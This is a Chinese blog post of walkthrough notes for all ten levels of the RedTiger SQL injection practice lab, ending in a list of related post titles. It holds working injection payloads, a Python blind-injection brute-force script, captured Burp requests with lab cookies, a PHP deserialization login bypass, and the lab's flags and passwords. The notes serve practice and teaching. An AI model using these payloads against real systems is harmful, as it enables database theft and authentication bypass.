SQL注入大闯关笔记
2024-05-06 21:48:19
目录
- 前言
- 一、SQL注入是什么?
- 二、靶场是什么?
- 三、挖掘漏洞
- 1.redtiger靶场
- 1.第一关
- 2.第二关
- 3.第三关
- 4.第四关
- 5.第五关
- 6.第六关
- 7.第七关
- 8.第八关
- 9.第九关
- 10.第十关
- 总结
前言
随着国家对安全越来越重视,个人感觉每个人都需要了解一下安全方面的知识。学习安全,先要从靶场做起,说干就干。
一、SQL注入是什么?
所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为存储过程的输入参数,这类表单特别容易受到SQL注入式攻击。(两点:1.用户有输入;2.用户的输入被当作代码执行)
二、靶场是什么?
通俗讲,就是新手练手学习的一个环境。
三、挖掘漏洞
下面从靶场开始做起。
1.redtiger靶场
位置:https://redtiger.labs.overthewire.org
准备的工具有:hackbar插件;ubantu20.04;phpstudy;pycharm;burp suite
1.第一关
位置:https://redtiger.labs.overthewire.org/level1.php
步骤:
1.点击“Category: 1”
2.构造payload,页面已经给出了Tablename:
https://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from level1_users
3.得出用户名,密码。下一关
2.第二关
位置:https://redtiger.labs.overthewire.org/level2.php
步骤:
1.在用户名和密码处输入万能密码
1'or '1'='1
2.源码中密码那里的代码估计是
password=''
3.加入万能密码的payload后,变成了
password='1'or '1'='1'
下一关
3.第三关
位置:https://redtiger.labs.overthewire.org/level3.php
步骤:
1.点击“Admin”
2.在url栏中,usr后面加上[],重新访问
https://redtiger.labs.overthewire.org/level3.php?usr[]=MDQyMjExMDE0MTgyMTQw
3.出现报错信息,下载错误信息中的加密函数文件
https://redtiger.labs.overthewire.org/urlcrypt.inc
4.将错误函数整理一下,写成.php文件,放入phpstudy(这里必须要是linux环境,我用的ubantu20.04)中运行,得出加密的字符串
// warning! ugly code ahead :)// requires php5.x, sorry for that//$str就是自己写的payload$str = "Admin' order by 7-- +";$cryptedstr = "";srand(3284724);for ($i =0; $i < strlen($str); $i++){$temp = ord(substr($str,$i,1)) ^ rand(0, 255); while(strlen($temp)<3){$temp = "0".$temp;}$cryptedstr .= $temp. "";}echo base64_encode($cryptedstr);
?>
5.linux环境如下:
root@ubuntu:/www/admin/localhost_80/wwwroot# ls
1.php 2.php error
root@ubuntu:/www/admin/localhost_80/wwwroot# cat 2.php
<?php// warning! ugly code ahead :)// requires php5.x, sorry for that//$str就是自己写的payload$str = "Admin' order by 6 -- +";$cryptedstr = "";srand(3284724);for ($i =0; $i < strlen($str); $i++){$temp = ord(substr($str,$i,1)) ^ rand(0, 255); while(strlen($temp)<3){$temp = "0".$temp;}$cryptedstr .= $temp. "";}echo base64_encode($cryptedstr);
?>
root@ubuntu:/www/admin/localhost_80/wwwroot#
6.手注,字段测试:
//先用8个字段测试,得出加密字符串,放进url中,报错了
$str = "Admin' order by 8 -- +"; ==>MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0MTQyMDA5MTczMDA2MDY5MjMxMDY1MTc2MDcxMDQ1MTky
https://redtiger.labs.overthewire.org/level3.php?usr=MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0MTQyMDA5MTczMDA2MDY5MjMxMDY1MTc2MDcxMDQ1MTky
//再用7个字段测试,得出加密字符串,放进url中,没有报错
$str = "Admin' order by 7 -- +"; ==>MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0MTQyMDA5MTczMDA2MDY5MjMyMDY1MTc2MDcxMDQ1MTky
https://redtiger.labs.overthewire.org/level3.php?usr=MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0MTQyMDA5MTczMDA2MDY5MjMyMDY1MTc2MDcxMDQ1MTky
7.手注,发现显示位为:
Username: 2
First name: 6
Name: 7
ICQ: 5
Email: 4
//payload
$str = "1' union select 1,2,3,4,5,6,7 #";==>MDkwMTQ0MDY3MTcwMTQwMjI0MTQ0MDg2MTMwMTE0MTg0MTQ0MDc2MTcyMDExMDY5MjM4MDc3MTc1MDcwMDYyMTk5MjM1MjE5MDgxMjQ2MTUyMjA4MTc4MTA4MTUw
https://redtiger.labs.overthewire.org/level3.php?usr=MDkwMTQ0MDY3MTcwMTQwMjI0MTQ0MDg2MTMwMTE0MTg0MTQ0MDc2MTcyMDExMDY5MjM4MDc3MTc1MDcwMDYyMTk5MjM1MjE5MDgxMjQ2MTUyMjA4MTc4MTA4MTUw
8.手注,得到flag:
//payload
$str = "1' union select 1,username,3,4,5,password,7 from level3_users where username='Admin' #";==>https://redtiger.labs.overthewire.org/level3.php?usr=MDkwMTQ0MDY3MTcwMTQwMjI0MTQ0MDg2MTMwMTE0MTg0MTQ0MDc2MTcyMDExMDY5MjM4MDc3MjMyMDI1MTA0MTUzMTc3MTUwMDA5MTkxMTMwMjA3MTY5MTIwMTUzMTk3MDQwMTA0MTc3MTQ5MjA5MTg0MTEzMDU0MTgwMjA4MTE4MjE4MTcwMTc4MDE1MTk4MDAyMTQ2MTE1MDcwMTQzMTU0MDI3MDE3MTY1MTY0MDQ3MDM2MDgwMjIzMDQ4MDc5MTI1MTAxMTA3MTU1MTQ2MDk0MTU0MjAyMDY4MDMyMjIzMTQ3MDYzMDUyMjI3MDY1MTI3MjA4MDU5MjE5MTQzMDk0
https://redtiger.labs.overthewire.org/level3.php?usr=MDkwMTQ0MDY3MTcwMTQwMjI0MTQ0MDg2MTMwMTE0MTg0MTQ0MDc2MTcyMDExMDY5MjM4MDc3MjMyMDI1MTA0MTUzMTc3MTUwMDA5MTkxMTMwMjA3MTY5MTIwMTUzMTk3MDQwMTA0MTc3MTQ5MjA5MTg0MTEzMDU0MTgwMjA4MTE4MjE4MTcwMTc4MDE1MTk4MDAyMTQ2MTE1MDcwMTQzMTU0MDI3MDE3MTY1MTY0MDQ3MDM2MDgwMjIzMDQ4MDc5MTI1MTAxMTA3MTU1MTQ2MDk0MTU0MjAyMDY4MDMyMjIzMTQ3MDYzMDUyMjI3MDY1MTI3MjA4MDU5MjE5MTQzMDk0Username: Admin
First name: thisisaverysecurepasswordEEE5rt
下一关
4.第四关
位置:https://redtiger.labs.overthewire.org/level4.php
步骤:
1.无论在用户名和密码处还是在url中输入万能密码,都没有办法试出错误
2.尝试在url中,输入sleep(5),看看是不是延迟盲注,果然是的
https://redtiger.labs.overthewire.org/level4.php?id=1 and sleep(5)
3.开始猜字段的长度
//开始使用20的长度试试看,页面没有变化:Query returned 0 rows.
and (select length(keyword) from level4_secret limit 0,1)=20 #
//然后使用21的长度试试看,页面有变化:Query returned 1 rows. 说明21就是字段长度
and (select length(keyword) from level4_secret limit 0,1)=21 #
https://redtiger.labs.overthewire.org/level4.php?id=1%20and%20(select%20length(keyword)%20from%20level4_secret%20limit%200,1)=21%20#
4.开始猜字段的值
//开始使用107(k的ascii=107)试试看,页面有变化:Query returned 1 rows. 说明k就是值的第一个字母
and (ascii(substr((select keyword from level4_secret limit 0,1),1,1)))=107 #
https://redtiger.labs.overthewire.org/level4.php?id=1 and (ascii(substr((select keyword from level4_secret limit 0,1),1,1)))=107 #
//接着使用105(i的ascii=107)试试看,页面有变化:Query returned 1 rows. 说明i就是值的第二个字母
and (ascii(substr((select keyword from level4_secret limit 0,1),2,1)))=105 #
https://redtiger.labs.overthewire.org/level4.php?id=1 and (ascii(substr((select keyword from level4_secret limit 0,1),2,1)))=105 #
5.写一个脚本跑一下
import requests
import timeurl = "https://redtiger.labs.overthewire.org/level4.php?id=1"
cookies = {'level2login': 'passwords_will_change_over_time_let_us_do_a_shitty_rhyme','level3login': 'feed_the_cat_who_eats_your_bread','level4login': 'put_the_kitten_on_your_head'
}
keyword = []
#字段长度是21
for pos in range(1,22):#从ascii中的 ! 一直跑到 del 字符for num in range(33,127):payload = url + " and (ascii(substr((select keyword from level4_secret limit 0,1)," + str(pos) + ",1)))=" + str(num) + " #"target = requests.get(url=payload, cookies=cookies)if "Query returned 1 rows." in target.text:# print(chr(num))keyword.append(chr(num))print(chr(num))breaktime.sleep(1)
print(keyword)
6.得出结果:killstickswithbr1cks!
下一关
5.第五关
位置:https://redtiger.labs.overthewire.org/level5.php
步骤:
1.在username和password处分别尝试万能语法,得出错误提示
1' or 1=1'
Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /var/www/html/hackit/level5.php on line 46
2.根据错误信息,得出参数为1,盲猜,开发的用的登录语句是:
select username password from table where username='xxx'
3.然后将得到的密码勇md5加密后,与数据库的密码做对比,所以构造一下payload:
username:' union select 1,md5(23)#
password:23
//只要md5()里面的内容和密码一样就行
下一关
6.第六关
位置:https://redtiger.labs.overthewire.org/level6.php
步骤:
1.在“user=1"后面加’,得出存在SQL注入
2.接着就是order by了
//order by 1,2,3,4,5,6,7 出错
https://redtiger.labs.overthewire.org/level6.php?user=1 order by 1,2,3,4,5,6,7
//尝试order by 1,2,3,4,5 没有出错,得出有5个字段
3.常规流程,找出显错位
' union select 1,2,3,4,5
https://redtiger.labs.overthewire.org/level6.php?user=1' union select 1,2,3,4,5
4.经尝试,发现显错位是在第二个字段,得出Username:admin
' union select 1,username,3,4,5
http://redtiger.labs.overthewire.org/level6.php?user=0 union select 1,username,3,4,5 from level6_users where status = 1 #
5.然后测试password:
http://redtiger.labs.overthewire.org/level6.php?user=1 union select 1,username,3,password,5 from level6_users where status = 1 #
6.经测试发现,无论password放在那个字段都不行,于是猜测是二次注入:
//开发人员的思路可能是:1.用id查到username;2.用username查询username和email,所以注入代码也要更改成二次注入
//第一条SQL语句
union select 1,username,3,4,5 from level6_users where status = 1 #
//第二条SQL语句
union select 1,username,password,4,5 from level6_users where status=1 #
//拼接上面2条语句,将第一条的username换成第二条的SQL语句
union select 1,' union select 1,username,password,4,5 from level6_users where status=1 #,3,4,5 from level6_users where status = 1
7.发现报错了,将第二条SQL语句进行16进制转换,再次尝试
//为了的概率的获取username和password,我把5个字段全部填满了,在进行16进制转换
' union select username,username,password,password,password from level6_users where status=1 #
//转换后的结果是
0x2720756e696f6e2073656c65637420757365726e616d652c757365726e616d652c70617373776f72642c70617373776f72642c70617373776f72642066726f6d206c6576656c365f7573657273207768657265207374617475733d312023
//再塞进第一条语句,注意:此处不要在user=0后面加单引号‘
union select 1,0x2720756e696f6e2073656c65637420757365726e616d652c757365726e616d652c70617373776f72642c70617373776f72642c70617373776f72642066726f6d206c6576656c365f7573657273207768657265207374617475733d312023,3,4,5 from level6_users where status = 1
http://redtiger.labs.overthewire.org/level6.php?user=0 union select 1,0x2720756e696f6e2073656c65637420757365726e616d652c757365726e616d652c70617373776f72642c70617373776f72642c70617373776f72642066726f6d206c6576656c365f7573657273207768657265207374617475733d312023,3,4,5 from level6_users where status = 1
8.拿到username和password
Username: admin
Email: m0nsterk1ll
9.备注:为什么需要二次注入?下面从开发者源码的角度分析一下,此处可能的源码是:
//此处进行了2次SQL查询
$sql="select username,password from level6_users where id=1";
$result=mysql_query($sql) or die('<pre>'.mysql_error().'</pre>');
$row=mysql_fetch_row($result);
$username=$row1[1];
$sql2="select username,email from level6_users where username="."'".$username."'"
下一关
7.第七关
位置:https://redtiger.labs.overthewire.org/level7.php
步骤:
1.在输入框处输入单引号‘测试,发现报错
//此处爆露出5个字段
SELECT news.*,text.text,text.title FROM level7_news news, level7_texts text WHERE text.id = news.id AND (text.text LIKE '%'%' OR text.title LIKE '%'%')
2.经测试,发现#被禁用了,但是%a0没有,于是就用 ”-- “来注释,空格用%a0来代替。通过burp suite抓包,在repeater模块重放
//payload
POST /level7.php?http:%2f%2fredtiger.labs.overthewire.org%2flevel7.php HTTP/1.1
Host: redtiger.labs.overthewire.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://redtiger.labs.overthewire.org/level7.php?http:%2f%2fredtiger.labs.overthewire.org%2flevel7.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Origin: http://redtiger.labs.overthewire.org
Connection: close
Cookie: level2login=passwords_will_change_over_time_let_us_do_a_shitty_rhyme; level3login=feed_the_cat_who_eats_your_bread; level4login=put_the_kitten_on_your_head; level5login=this_hack_it%27s_old; level6login=the_stone_is_cold; level7login=shitcoins_are_hold
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cachesearch=1%') union select 1,2,3,4 --%a0&dosearch=search%21
3.页面给出了显示位4和3,更换payload,重放数据包
POST /level7.php?http:%2f%2fredtiger.labs.overthewire.org%2flevel7.php HTTP/1.1
Host: redtiger.labs.overthewire.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://redtiger.labs.overthewire.org/level7.php?http:%2f%2fredtiger.labs.overthewire.org%2flevel7.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Origin: http://redtiger.labs.overthewire.org
Connection: close
Cookie: level2login=passwords_will_change_over_time_let_us_do_a_shitty_rhyme; level3login=feed_the_cat_who_eats_your_bread; level4login=put_the_kitten_on_your_head; level5login=this_hack_it%27s_old; level6login=the_stone_is_cold; level7login=shitcoins_are_hold
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cachesearch=google%') union select 1,2,3,autor from level7_news --%a0&dosearch=search%21
4.得出返回包
HTTP/1.1 200 OK
Date: Wed, 17 Mar 2021 08:15:39 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2906
Connection: close
Content-Type: text/html; charset=UTF-8<b>Welcome to Level 7</b><br><br>Target: Get the name of the user who posted the news about google. Table: level7_news column: autor<br>Restrictions: no comments, no substr, no substring, no ascii, no mid, no like<br><br><br><br> <form method="post"> <input type="text" name="search" value=""> <input type="submit" value="search!" name="dosearch"> </form> <br><br><br><b>Google: The browser is the computer</b><br>SAN FRANCISCO--Google spent Wednesday morning trying to get developers excited about the next generation of Web technologies by showing off how future Web applications will mimic desktop apps."It's time for us to take advantage of the amazing opportunity that is before us," said Google CEO Eric Schmidt, kicking off Google I/O 2009 in San Francisco. Schmidt was referring to the growing sense that the Internet and browsers--rather than a computer's operating system--will be the future foundation for application development.The industry isn't quite ready for that yet. Many of applications demonstrated before the crowd of around 4,000 developers will require the widespread adoption of HTML 5 technologies, which are still under development by a consortium of companies and organizations.Still, Google's Vic Gundotra, vice president of engineering, noted that the four modern open-source browsers (Firefox, Safari, Chrome,and Opera) are all adopting some HTML 5 technologies as they become more stable, taking every opportunity possible to ding Microsoft's Internet Explorer for lagging behind the other four browsers.Gundotra showed off how Web applications will be able to take advantage of five main HTML 5 concepts: canvas tags, video tags, geolocation, application caching and database, and Web Workers.For example, canvas tags help developers bring all kinds of sophisticated graphics to their Web applications without having to use a plug-in--which is also the appeal of the video tag. Google showed off an "experiment" with YouTube videos coded using the video tags, which gives developers quite a few more options when it comes to how those videos can be embedded into a Web page.Geolocation is another huge topic of late with mobile applications. Google showed off how its Google Latitude application takes advantage of a new iPhone geolocation API that Apple will release as part of the iPhone 3.0 software to run in the mobile Safari browser. Mozilla's Jay Sullivan also showed off how Firefox 3.5 will come with a button that allows the browser to pinpoint your location in Google Maps using Wi-Fi and cell tower positioning data.<br><br><br><b>site_admin</b><br>3<br><br><br><b>press</b><br>3<br><br><br><b>TestUserforg00gle</b><br>3<br><br><br><b>apple</b><br>3<br><br><br><br><form method="post">Username: <input type="text" name="username"><br><input type="submit" name="try" value="Check!"></form><br>
5.仔细观察返回包,注意到有一行,都试一下每个username即可,下一关
Geolocation is another huge topic of late with mobile applications. Google showed off how its Google Latitude application takes advantage of a new iPhone geolocation API that Apple will release as part of the iPhone 3.0 software to run in the mobile Safari browser. Mozilla's Jay Sullivan also showed off how Firefox 3.5 will come with a button that allows the browser to pinpoint your location in Google Maps using Wi-Fi and cell tower positioning data.<br><br><br><b>site_admin</b><br>3<br><br><br><b>press</b><br>3<br><br><br><b>TestUserforg00gle</b><br>3<br><br><br><b>apple</b><br>3<br><br><br>
8.第八关
位置:https://redtiger.labs.overthewire.org/level8.php
步骤:
1.在Email处输入单引号’,报错了,说名存在注入
2.在Name处输入单引号’,直接给出了Username: Admin
3.根据报错,猜测源码那块是update语句,字段顺序为name,email,icq,age
update table_name set name = 'xxx', email = 'xxx', icq = 'xxx', age = xxx where id = 1
4.构造payload,将password赋值给name,然后显示在页面中
',name = password,email = '
//拼接成完整的SQL语句后,是这样的
update table_name set name = ' ',name = password,email = ' ', email = 'xxx', icq = 'xxx', age = xxx where id = 1
5.在Name处显示出了密码,下一关
9.第九关
位置:https://redtiger.labs.overthewire.org/level9.php
步骤:
1.在提交框里面发现有SQL注入
2.尝试注入看看
') union select 1,2,3,4,5 from level9_users --%0a
3.没有反应,后面听说是insert函数报错,源代码可能是这样的
printf("INSERT INTO listing (name, title, text) VALUES (%s,%s,%s)", $name,$title,$text);
4.开始构造个payload
'), ((select username from level9_users), (select password from level9_users), '
//还原成源码里面是这样的:
INSERT INTO listing (name, title, text) VALUES ('','',''), ((select username from level9_users), (select password from level9_users), '')
//这样就插进去2条数据了,最后一条就是我们要查询的信息
5.得到结果:
Autor: TheBlueFlower
Title: this_oassword_is_SEC//Ure.promised!
最后一关
10.第十关
位置:https://redtiger.labs.overthewire.org/level10.php
步骤:
1.页面只有一个button,这势必要用burp suite抓包测试了
2.开启bp,点击按钮,抓包,放到repeater里面
POST /level10.php HTTP/1.1
Host: redtiger.labs.overthewire.org
Connection: close
Content-Length: 112
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://redtiger.labs.overthewire.org
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.54
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://redtiger.labs.overthewire.org/level10.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,fr;q=0.5,fil;q=0.4
Cookie: __utma=176859643.967972366.1612269538.1612269538.1612269538.1; __utmz=176859643.1612269538.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); level2login=passwords_will_change_over_time_let_us_do_a_shitty_rhyme; level3login=feed_the_cat_who_eats_your_bread; level4login=put_the_kitten_on_your_head; level5login=this_hack_it%27s_old; level6login=the_stone_is_cold; level7login=shitcoins_are_hold; level8login=or_so_i%27m_told; level9login=network_pancakes_milk_and_wine; level10login=whatever_just_a_fresh_passwordlogin=YToyOntzOjg6InVzZXJuYW1lIjtzOjY6Ik1vbmtleSI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9&dologin=Login
3.将原始的payload中的login拿出来,解密一下,根据经验是base64加密的,解密结果是
//原始数据
YToyOntzOjg6InVzZXJuYW1lIjtzOjY6Ik1vbmtleSI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9
//解密结果
a:2:{s:8:"username";s:6:"Monkey";s:8:"password";s:12:"0815password";}
4.把"Monkey"改为"TheMaster",重新加密,放过去
//修改后
a:2:{s:8:"username";s:6:"TheMaster";s:8:"password";s:12:"0815password";}
//加密
YToyOntzOjg6InVzZXJuYW1lIjtzOjY6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9
//放包
login=YToyOntzOjg6InVzZXJuYW1lIjtzOjY6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9&dologin=Login
5.报错,反序列化之类的。再看payload中的"password"字段,设置的是12位的string,尝试改为bool类型,值为1
//修改后
a:2:{s:8:"username";s:9:"TheMaster";s:8:"password";b:1;}
//加密
YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=
//放包
login=YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=&dologin=Login
6.看界面变化
Welcome TheMaster.
You solved the hackit :)You can raise your wechall.net score with this flag: 721ce43d433ad85bcfa56644b112fa52The password for the hall of fame is: make_the_internet_great_again
7.通关留名
总结
1.好在要防止ASP.NET应用被SQL注入式攻击闯入并不是一件特别困难的事情,只要在利用表单输入的内容构造SQL命令之前,把所有输入内容过滤一番就可以了(不要相信用户的任何输入)。
2.这些渗透测试的黑客真的异于常人。
3.平时多总结,看看网上别人的做法,自己多积累经验。
SQL注入大闯关笔记相关推荐
- 前端智勇大闯关-第二季-第三题
前端智勇大闯关-第二季-第三题 10的世界 在我们的世界里,字母A很好理解 键盘兄表示65无压力 CPU表示01000001才是王道 1.题目中描述的三句话:二进制与十进制与A之间的相互转换 2.在t ...
- 小鸡拿着蚯蚓闯关的java游戏,蚯蚓大闯关游戏下载|蚯蚓大闯关安卓版下载 v1.0.0 - 跑跑车安卓网...
蚯蚓大闯关是一款很赞的益智游戏,作为一只蠕虫,陷入了陷阱里,你需要想尽办法努力的逃脱这里,十分的有趣好玩,不要错过哦. 游戏介绍 一只叫做汤姆的蠕虫想要逃离致命的陷阱,你需要帮助它完成数十个令人惊叹的 ...
- 摸鱼大闯关(1-10)
摸鱼大闯关(1-10)XW持续更新 文章目录 摸鱼大闯关(1-10)XW持续更新 Stage1 Stage2 Stage 3 Stage 4 Stage 5 Stage 6 Stage 7 Stage ...
- 小鸡拿着蚯蚓闯关的java游戏,饥饿蚯蚓大闯关游戏下载
饥饿蚯蚓大闯关免费版是非常好玩的谜闯关类游戏,游戏关卡很丰富,都有一定的难度,玩家需要花费一些时间去尝试关卡并且此成功完成挑战.游戏玩法简单,华卖弄简约,喜欢的游戏玩家,快来下载吧! 饥饿蚯蚓大闯关手 ...
- Java IO流大闯关--IO流的常用实现类
这个系列的博客主要是对Java高级编程中IO流相关的知识点做一个梳理,内容主要包括File类.IO流原理及流的分类.文件流.缓冲流.转换流.标准输入输出流.打印流.数据流.对象流.随机存取文件流.NI ...
- 【最全干货】SQL注入大合集
进来先点个赞,评个论,关个注呗- 获取更多学习资料.想加入社群.深入学习,请扫我的二维码或加Memory20000427,诚意教学,白嫖绕道. 前言 SQL注入的攻击方式根据应用程序处理数据库返回内容 ...
- sql注释符注入防御_读《SQL注入***与防御》笔记
' //单引号报错,转义 %bf%5c%27 //宽字节注入,数据库编码为GBK时,%bf%5c认为是一个字节,绕过PHP正则 UNION ALL SELECT LOAD_FILE('/etc/pas ...
- 基于Sqli-Labs靶场的SQL注入-第五关(重点讲双查询注入)
目录 less-5:注入点为单引号的报错注入 什么是报错注入 常见的报错注入 什么是双查询注入 双查询中用到的语句以及函数 爆破数据库名字 双查询注入的报错原理 爆破数据库表名 爆破列名 爆破字段值 ...
- sqli-labs闯关笔记(Challenges)
sqli-labs项目地址:https://github.com/Audi-1/sqli-labs 文章目录 Less-54 Less-55 Less-56 Less-57 Less-58 Less- ...
- XSS challenges闯关笔记
文章目录 stage-1 没有过滤的XSS stage-2 标签属性中的XSS stage-3 选择列表中的XSS stage-4 隐藏提交参数中的XSS stage-5 限制输入长度的XSS sta ...
最新文章
- Oracle优化08-并行执行
- coreldraw水涟漪怎么做_曹晓岚:水公园的主题文化营销怎么做?
- Mircosoft 正式把Windows Mobile改名为Windows Phone,你会因此而购买Windows Phone吗?
- springmvc常用注解之@Controller和@RequestMapping
- Python 时间常用函数及结构
- 二维分类教案_幼儿园中班数学教案中班数学教案二维排序——师乐汇幼儿教师教育网...
- Chrome浏览器获取XPATH的方法----通过开发者工具获取
- 五年后的计算机视觉会是什么样?和CV先驱们一同畅想(上) | CVPR2019
- Android https通信问题
- 数据库零碎---常用的mysql命令,收藏了,方便查阅
- three.js mtl材质贴图未显示_C4D材质到底该怎么用?大多数设计师都没搞明白!
- 传说有位游客在山顶大声谈论着小孤嫁彭郎的故事
- 雕虫小技也重要--数据处理中的电子表格技巧
- 分享假如你买到缩水U盘了怎么办?认倒霉?肯定不能的!
- 世界为什么是五彩缤纷
- FPGA-出租车计价器的实现
- Google Guava 工具类库
- OTFS学习_12.15
- 阿里云域名实名认证状态查询
- matlab实现一个简单的细胞自动机小游戏